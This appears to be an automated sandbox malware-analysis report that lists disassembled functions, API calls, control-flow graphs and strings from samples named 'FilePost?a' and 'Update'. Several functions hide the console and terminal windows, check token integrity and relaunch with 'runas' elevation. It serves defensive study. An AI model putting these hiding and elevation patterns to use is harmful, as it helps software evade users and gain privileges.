                                                    • Opcode ID: 649cab4ac2e0e841b3dbc20a23fea9c1efe7b007d03d3ff462b1a23546823310
                                                    • Instruction ID: 91333b8b609a19192c6a286da737217b2594dd25933824cec1633d72bead44b7
                                                    • Opcode Fuzzy Hash: 649cab4ac2e0e841b3dbc20a23fea9c1efe7b007d03d3ff462b1a23546823310
                                                    • Instruction Fuzzy Hash: EC613332E1C94A5FE268A77C68552BA67D1FB856A2F14427BC44EC32C6EE3C68034395
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HAH$HAH$HAH$hkI$hkI$hkI
                                                    • API String ID: 0-4089910148
                                                    • Opcode ID: 51aa61227c5af9ce027e4f1900d41cab2631062ad7eb6714f1caff20bcd2bdec
                                                    • Instruction ID: 54a040eed44dbad8511441d315d2c64a2a64fee877136f84f5a91c41617a2789
                                                    • Opcode Fuzzy Hash: 51aa61227c5af9ce027e4f1900d41cab2631062ad7eb6714f1caff20bcd2bdec
                                                    • Instruction Fuzzy Hash: C1513D32E0D98E4FE755E76898652BA7BE2EF95350F0402BAC00DC72D7DE286C068395
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^N$M_^P$M_^f$M_^t$M_^v
                                                    • API String ID: 0-3677958243
                                                    • Opcode ID: 54bf79eca11c34a60e96376837a873a732263574b28baaee6fb5e501a4ba7869
                                                    • Instruction ID: 1929a3d51b338a7804d74fc82e78b16024177d30cd054625a0a672ac19412a7b
                                                    • Opcode Fuzzy Hash: 54bf79eca11c34a60e96376837a873a732263574b28baaee6fb5e501a4ba7869
                                                    • Instruction Fuzzy Hash: 6D81A317A1F15AA9E25177BC74550FA6B60EF823BDF1847B7D1CC8D0C39E0D208646AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.2063095066.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ff848f30000_Update.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: eH$XfH$xmH$]H
                                                    • API String ID: 0-3741607822
                                                    • Opcode ID: d327bcafb7ddb4dbccd1c3fbf5c76d31e8e3440416292b4423e3f84695f37d64
                                                    • Instruction ID: a4c95b96d22b4350329a2916d0260bf6085ec9aed3f7f1c471bc578e30faf6c4
                                                    • Opcode Fuzzy Hash: d327bcafb7ddb4dbccd1c3fbf5c76d31e8e3440416292b4423e3f84695f37d64
                                                    • Instruction Fuzzy Hash: 6CA14672E1D98A8FE785E77C98152B97BE1EFA5250F0841BBC00DC71D7DE28A8858384
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:0.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:16.1%
                                                    Total number of Nodes:124
                                                    Total number of Limit Nodes:9

                                                    Control-flow Graph

                                                    APIs
                                                    • ShellExecuteExW.SHELL32 ref: 6CF54ADB
                                                    • WaitForSingleObject.KERNEL32(6CF9C8CD,000000FF), ref: 6CF54AEA
                                                    • CloseHandle.KERNEL32(6CF9C8CD), ref: 6CF54AF3
                                                    • GetClassNameW.USER32(?,?,00000064), ref: 6CF54B91
                                                    • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6CF54BA3
                                                    • ShowWindow.USER32(?,00000000), ref: 6CF54BAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ClassCloseExecuteHandleNameObjectShellShowSingleWaitWindowlstrcmp
                                                    • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                                    • API String ID: 1631206612-3791737310
                                                    • Opcode ID: e1ad600c9dd8febe2f8244d975f6c12549a2154248111077d7175cdb9339a51e
                                                    • Instruction ID: ea0eb1bef703338b92ee92d5349b8cd0b7e36032431211d7c03f178fcea6fb27
                                                    • Opcode Fuzzy Hash: e1ad600c9dd8febe2f8244d975f6c12549a2154248111077d7175cdb9339a51e
                                                    • Instruction Fuzzy Hash: 12416071E10208ABDF44DFA4C945BEEBBB8FF09314F50425AF911A7680DB749A58CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • __RTC_Initialize.LIBCMT ref: 6CF77B2D
                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6CF77B47
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                    • String ID:
                                                    • API String ID: 2442719207-0
                                                    • Opcode ID: 36e49c7ccd137609d1f6859b0bcdcaa6d92f9cbda9c4f1c2456c340cf55913a5
                                                    • Instruction ID: c77c06a5f9dc13624b7c14feb676ec8e646825fd2649dd69f8849e18e96c8d84
                                                    • Opcode Fuzzy Hash: 36e49c7ccd137609d1f6859b0bcdcaa6d92f9cbda9c4f1c2456c340cf55913a5
                                                    • Instruction Fuzzy Hash: CF412332E21214ABDB328F69EC40BAF7AB4EB85768F11452BE810A7B50C7304D158BF0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • EnumWindows.USER32(6CF54B70,00000000), ref: 6CF54C00
                                                    • GetConsoleWindow.KERNELBASE(00000000), ref: 6CF54C08
                                                    • ShowWindow.USER32(00000000), ref: 6CF54C0F
                                                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 6CF54C20
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 6CF54C27
                                                    • GetTokenInformation.KERNELBASE(00000004,00000014(TokenIntegrityLevel),?,00000004,?), ref: 6CF54C47
                                                      • Part of subcall function 6CF53970: GetModuleFileNameW.KERNEL32(00000000,?,00000104,69F2C272), ref: 6CF53878
                                                      • Part of subcall function 6CF54A50: ShellExecuteExW.SHELL32 ref: 6CF54ADB
                                                      • Part of subcall function 6CF54A50: WaitForSingleObject.KERNEL32(6CF9C8CD,000000FF), ref: 6CF54AEA
                                                      • Part of subcall function 6CF54A50: CloseHandle.KERNEL32(6CF9C8CD), ref: 6CF54AF3
                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 6CF54C5B
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CloseProcessTokenWindow$ChangeConsoleCurrentEnumExecuteFileFindHandleInformationModuleNameNotificationObjectOpenShellShowSingleWaitWindows
                                                    • String ID:
                                                    • API String ID: 2167664763-0
                                                    • Opcode ID: cd8aecfe0a7713f2a9ee1587d59319195d6a3e7337856445d8bf8591d9ec3776
                                                    • Instruction ID: fc54ec5e112f6bc6638ac047a40ec1a312fc7a4b849e1d027bb38b15012eec34
                                                    • Opcode Fuzzy Hash: cd8aecfe0a7713f2a9ee1587d59319195d6a3e7337856445d8bf8591d9ec3776
                                                    • Instruction Fuzzy Hash: 0C418D71E10108ABDF04DFA4DC98BAEBBB8EF15704F904119F612A7A90DB349564CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 108 6cf77b96-6cf77ba7 call 6cf78690 111 6cf77ba9-6cf77baf 108->111 112 6cf77bb8-6cf77bbf 108->112 111->112 115 6cf77bb1-6cf77bb3 111->115 113 6cf77bc1-6cf77bc4 112->113 114 6cf77bcb-6cf77bdf dllmain_raw 112->114 113->114 117 6cf77bc6-6cf77bc9 113->117 118 6cf77be5-6cf77bf6 dllmain_crt_dispatch 114->118 119 6cf77c88-6cf77c8f 114->119 116 6cf77c91-6cf77ca0 115->116 120 6cf77bfc-6cf77c01 call 6cf54dd0 117->120 118->119 118->120 119->116 122 6cf77c06-6cf77c0e 120->122 123 6cf77c37-6cf77c39 122->123 124 6cf77c10-6cf77c12 122->124 126 6cf77c40-6cf77c51 dllmain_crt_dispatch 123->126 127 6cf77c3b-6cf77c3e 123->127 124->123 125 6cf77c14-6cf77c32 call 6cf54dd0 call 6cf77ae6 dllmain_raw 124->125 125->123 126->119 128 6cf77c53-6cf77c85 dllmain_raw 126->128 127->119 127->126 128->119
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                    • String ID:
                                                    • API String ID: 3136044242-0
                                                    • Opcode ID: ffff00908930b23fd30195cdb3efe056a8b2aa7f36dbbc23279efc1e41b025db
                                                    • Instruction ID: 19954a33eecfa97bb8a244841ec0ea7a2a35034a11596bf3b8f729a951893569
                                                    • Opcode Fuzzy Hash: ffff00908930b23fd30195cdb3efe056a8b2aa7f36dbbc23279efc1e41b025db
                                                    • Instruction Fuzzy Hash: 0E218072D21618ABDB334F15ED40EAF7A79EB85798B12452BF81457A10C3308D518BF0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 134 6cf54b70-6cf54bab GetClassNameW lstrcmpW 135 6cf54bb5-6cf54bc8 call 6cf775e6 134->135 136 6cf54bad-6cf54baf ShowWindow 134->136 136->135
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000064), ref: 6CF54B91
                                                    • lstrcmpW.KERNELBASE(?,CASCADIA_HOSTING_WINDOW_CLASS), ref: 6CF54BA3
                                                    • ShowWindow.USER32(?,00000000), ref: 6CF54BAF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ClassNameShowWindowlstrcmp
                                                    • String ID: <$CASCADIA_HOSTING_WINDOW_CLASS$runas
                                                    • API String ID: 3203229717-3791737310
                                                    • Opcode ID: e688aec2af96c7f6fe51d1d05a2e7ad1e191a634755a07d4a462c3037121bf1b
                                                    • Instruction ID: a0f7adab8a75be8f1089f5e3ca3cdc9bdbe306271e046b101b71aa24aad94b13
                                                    • Opcode Fuzzy Hash: e688aec2af96c7f6fe51d1d05a2e7ad1e191a634755a07d4a462c3037121bf1b
                                                    • Instruction Fuzzy Hash: CEF08271E11118ABDF80DF64CE04FAA77BCEB09304F004196F900D7240EB30AE588BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • __RTC_Initialize.LIBCMT ref: 6CF77A2C
                                                      • Part of subcall function 6CF77655: InitializeSListHead.KERNEL32(6CFDB330,6CF77A36,6CFB6BA8,00000010,6CF779C7,?,?,?,6CF77BEF,?,00000001,?,?,00000001,?,6CFB6BF0), ref: 6CF7765A
                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CF77A96
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                    • String ID:
                                                    • API String ID: 3231365870-0
                                                    • Opcode ID: d37374a4446aa8d73187fb2df4816bd01904c452e73032c1d88c885ae5f67a04
                                                    • Instruction ID: 9855495e8ba71ed1ba6a0fb091a20af6af3e62e352275cbef777695082fe7c6e
                                                    • Opcode Fuzzy Hash: d37374a4446aa8d73187fb2df4816bd01904c452e73032c1d88c885ae5f67a04
                                                    • Instruction Fuzzy Hash: 1221D4316692025AFF2AAFB4F8007DC33B1DB0632DF34081BD541A6FD1CB22064996B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 182 6cf8b521-6cf8b526 183 6cf8b528-6cf8b540 182->183 184 6cf8b54e-6cf8b557 183->184 185 6cf8b542-6cf8b546 183->185 187 6cf8b569 184->187 188 6cf8b559-6cf8b55c 184->188 185->184 186 6cf8b548-6cf8b54c 185->186 189 6cf8b5c7-6cf8b5cb 186->189 192 6cf8b56b-6cf8b578 GetStdHandle 187->192 190 6cf8b55e-6cf8b563 188->190 191 6cf8b565-6cf8b567 188->191 189->183 193 6cf8b5d1-6cf8b5d4 189->193 190->192 191->192 194 6cf8b57a-6cf8b57c 192->194 195 6cf8b587 192->195 194->195 196 6cf8b57e-6cf8b585 GetFileType 194->196 197 6cf8b589-6cf8b58b 195->197 196->197 198 6cf8b5a9-6cf8b5bb 197->198 199 6cf8b58d-6cf8b596 197->199 198->189 200 6cf8b5bd-6cf8b5c0 198->200 201 6cf8b598-6cf8b59c 199->201 202 6cf8b59e-6cf8b5a1 199->202 200->189 201->189 202->189 203 6cf8b5a3-6cf8b5a7 202->203 203->189
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 6CF8B56D
                                                    • GetFileType.KERNELBASE(00000000), ref: 6CF8B57F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: FileHandleType
                                                    • String ID:
                                                    • API String ID: 3000768030-0
                                                    • Opcode ID: a36941213c3065627ea7cb4c22caced97a753080f81fcb07ba91d3c40e4a2a91
                                                    • Instruction ID: 3836b1357681d2df13afbae0f941467a33e500c3e06dc1886c1f45f9829ec996
                                                    • Opcode Fuzzy Hash: a36941213c3065627ea7cb4c22caced97a753080f81fcb07ba91d3c40e4a2a91
                                                    • Instruction Fuzzy Hash: 4111847260AB5146C7204E3E8C996177EB5AB47738B340F1AE4B58EDF5C330D585C251
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 204 6cf54dd0-6cf54dd7 205 6cf54dee-6cf54df4 204->205 206 6cf54dd9-6cf54de8 CreateThread 204->206 206->205
                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00000000,6CF54BD0,00000000,00000000,00000000), ref: 6CF54DE8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CreateThread
                                                    • String ID:
                                                    • API String ID: 2422867632-0
                                                    • Opcode ID: f35a586fadb7585dd14a4eb3240210976331e2b1e6a42096210bf6572400e607
                                                    • Instruction ID: cb07a57a6e3b70be4fde800b9f72839dcdcde25abfced64bf21fd11680a3c123
                                                    • Opcode Fuzzy Hash: f35a586fadb7585dd14a4eb3240210976331e2b1e6a42096210bf6572400e607
                                                    • Instruction Fuzzy Hash: E4D08C347D430873F6A00A525C0BF08372C6720F18FA08000F7047D9C080E2B4714A1D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    • memset.VCRUNTIME140 ref: 00ED4D45
                                                    • memset.VCRUNTIME140(?,00000000,00001000), ref: 00ED4D63
                                                    • Warning.VMWAREBASE(?,?,00000FFF,?,000003E8,?,00000000,00001000), ref: 00ED4D81
                                                    • GetLastError.KERNEL32 ref: 00ED4D8D
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED4D94
                                                    • Warning.VMWAREBASE(?,00000400,transaction on named pipe timeout: %s (%d),00000000,00000000), ref: 00ED4DAB
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000400,transaction on named pipe timeout: %s (%d),00000000,00000000), ref: 00ED4DB1
                                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,localconnect,0000000C), ref: 00ED4DE5
                                                    • Warning.VMWAREBASE(?,00001000,%s %d,LOCALCONNECT), ref: 00ED4E0E
                                                    • Warning.VMWAREBASE(?,?,?,?,000003E8), ref: 00ED4E3E
                                                    • GetLastError.KERNEL32 ref: 00ED4E4E
                                                    • Warning.VMWAREBASE(?,00000400,Malformed request from client: %s,?), ref: 00ED53A9
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,00000400,Malformed request from client: %s,?), ref: 00ED53B0
                                                    • CloseHandle.KERNEL32(?), ref: 00ED58C0
                                                    • Warning.VMWAREBASE(?,00001000,%s %s,ERROR,00000000), ref: 00ED58E7
                                                    • Warning.VMWAREBASE(?,?,?,?,000003E8), ref: 00ED5916
                                                    • GetLastError.KERNEL32 ref: 00ED5922
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$freememset$CloseHandlestrncmp
                                                    • String ID: $ $"%s" -T querytoken %s$%d %d$%d %d %d %d %d %d$%s $%s %d$%s %d %s$%s %s$%s 0x%x$%s VMX was requested, but not present. Using standard VMX.$%s-fd$%s: Denying opensecurable access: pid %d != pid %d$%s: GetNamedPipeClientProcessId failed: %d$Cannot connect to VMX: %s$Debug$ERROR$Error %d while duplicating token.$Error %d while sending ERROR reply$Error %d while sending OK reply$Error %d while sending PID reply$Error %d while sending local connect params reply$LOCALCONNECT$Malformed request from client: %s$OpenSecurable pipe client security check failed$OpenSecurable: FILE_FLAG_DELETE_ON_CLOSE disallowed$OpenSecurable: must open with OPEN_EXISTING$OpenSecurable: must open with share read/write/delete$Process '%s' created with pid %d$Stats$TLOCALCONNECT$TOKEN$Unrecognized command: %s.$VMAUTOMATION$ValidatePipeClientPid$localconnect$opensecurable$openvmautomation$startservice$testAutomation$tlocalconnect$transaction on named pipe timeout: %s (%d)$vmexec$vmexecdebug$vmexecstats$vmware-vmx.exe$|
                                                    • API String ID: 2975413436-463879127
                                                    • Opcode ID: ebddd39d7bbba3807b09a717bdced5f7a8e93d45f7e06415138d8797ba07b374
                                                    • Instruction ID: c53ea5a1e339d9bb95f5b6f03f2ab4bd8fb0632fca2b267ddf86690e219c542c
                                                    • Opcode Fuzzy Hash: ebddd39d7bbba3807b09a717bdced5f7a8e93d45f7e06415138d8797ba07b374
                                                    • Instruction Fuzzy Hash: 2862F5B2900718AEDB219B649D45FEA73BCEB04704F0451E7FA09B6382EB719B468F51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    APIs
                                                    • memset.VCRUNTIME140(?,00000000,00000044,?,00000000,00ED13A6), ref: 00ED6F17
                                                    • EnterCriticalSection.KERNEL32(00EE1098,?,00000000,00ED13A6), ref: 00ED6F41
                                                    • EnterCriticalSection.KERNEL32(00EE1098,?,00000000,00ED13A6), ref: 00ED6F7D
                                                    • memcpy.VCRUNTIME140(?,?,00000000,?,00000000,00ED13A6), ref: 00ED6F95
                                                    • LeaveCriticalSection.KERNEL32(00EE1098,?,?,?,?,00000000,00ED13A6), ref: 00ED6F9E
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000400,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED6FDD
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED6FED
                                                    • Warning.VMWAREBASE(Token %x user info query failed (err %d len %d),?,00000000,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED6FFB
                                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000400,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED702B
                                                    • EqualSid.ADVAPI32(?,?,?,?,?,?,00000000,00ED13A6), ref: 00ED7041
                                                    • LeaveCriticalSection.KERNEL32(00EE1098,?,00000000,00ED13A6), ref: 00ED7095
                                                    • Warning.VMWAREBASE(Reusing existing session,?,00000000,00ED13A6), ref: 00ED70B2
                                                    • Warning.VMWAREBASE(Allocating a new session,?,00000000,00ED13A6), ref: 00ED70D7
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,CreateLogonSessionInfo failed,?,?,?,?,00000000,00ED13A6), ref: 00ED7104
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED710C
                                                    • DuplicateTokenEx.ADVAPI32(?,000F01FF,00000000,00000002,00000001,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7159
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED7163
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,DuplcateTokenEx failed: %d.,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7178
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7180
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 00ED71E1
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED71EB
                                                    • Warning.VMWAREBASE(%s: AllocateAndInitializeSid failed: %u,SetTokenIntegrityLevel,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED71FC
                                                    • SetTokenInformation.ADVAPI32(00000000,00000019,?,00000008,?,?,?,?,00000000,00ED13A6), ref: 00ED7228
                                                    • GetLastError.KERNEL32(?,?,?,?,00000000,00ED13A6), ref: 00ED7232
                                                    • Warning.VMWAREBASE(%s: SetTokenInformation failed: %u,SetTokenIntegrityLevel,00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED7243
                                                    • FreeSid.ADVAPI32(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED725A
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,SetTokenIntegrityLevel failed.,?,?,?,?,00000000,00ED13A6), ref: 00ED7272
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00ED13A6), ref: 00ED727A
                                                    • Warning.VMWAREBASE(?,?,?,?,?,00000000,00ED13A6), ref: 00ED728F
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000002,Before: File_GetNTGlobalFinalPath failed for %s: %d,?,00000000,?,?,?,?,?,00000000,00ED13A6), ref: 00ED72B2
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00ED13A6), ref: 00ED729D
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • ImpersonateLoggedOnUser.ADVAPI32(00000000,?,?,?,?,?,00000000,00ED13A6), ref: 00ED72C4
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00ED13A6), ref: 00ED72CE
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00ED75BF
                                                    • Warning.VMWAREBASE(?,?,Process creation failed), ref: 00ED75D6
                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 00ED7602
                                                    • CloseHandle.KERNEL32(?), ref: 00ED760E
                                                    • CloseHandle.KERNEL32(?), ref: 00ED762D
                                                    • CloseHandle.KERNEL32(00000000), ref: 00ED764B
                                                    Strings
                                                    • %s: SetTokenInformation failed: %u, xrefs: 00ED723E
                                                    • @&!*@*@(msg.authd.termServLaunchFailureWS)Cannot power on the virtual machine. This may be because you are running inside a Terminal Services or Remote Desktop session or are in Fast User Switch Mode.For more information, refer to our Web site at "%s"., xrefs: 00ED7564
                                                    • Token %x user info query failed (err %d len %d), xrefs: 00ED6FF6
                                                    • ImpersonateLoggedOnUser failed: %d, xrefs: 00ED72D5
                                                    • SetTokenIntegrityLevel, xrefs: 00ED71F2, 00ED7239
                                                    • Failed to validate vmx file "%s", abort to launch it., xrefs: 00ED732D
                                                    • D, xrefs: 00ED7138
                                                    • SetTokenIntegrityLevel failed., xrefs: 00ED7264
                                                    • Process creation failed, xrefs: 00ED75C8
                                                    • Allocating a new session, xrefs: 00ED70D2
                                                    • DuplcateTokenEx failed: %d., xrefs: 00ED716A
                                                    • @, xrefs: 00ED6F1F
                                                    • `, xrefs: 00ED721E
                                                    • CreateProcessAsUser: The system cannot find the file "%s" (code: %d)., xrefs: 00ED75A6
                                                    • Reusing existing session, xrefs: 00ED70AD
                                                    • Before: File_GetNTGlobalFinalPath failed for %s: %d, xrefs: 00ED72A5
                                                    • After: File_GetNTGlobalFinalPath failed for %s : %d., xrefs: 00ED7304
                                                    • SetProcessWorkingSetSite failed: %d, xrefs: 00ED743C
                                                    • GlobalMemoryStatusEx failed: %d, xrefs: 00ED73E5
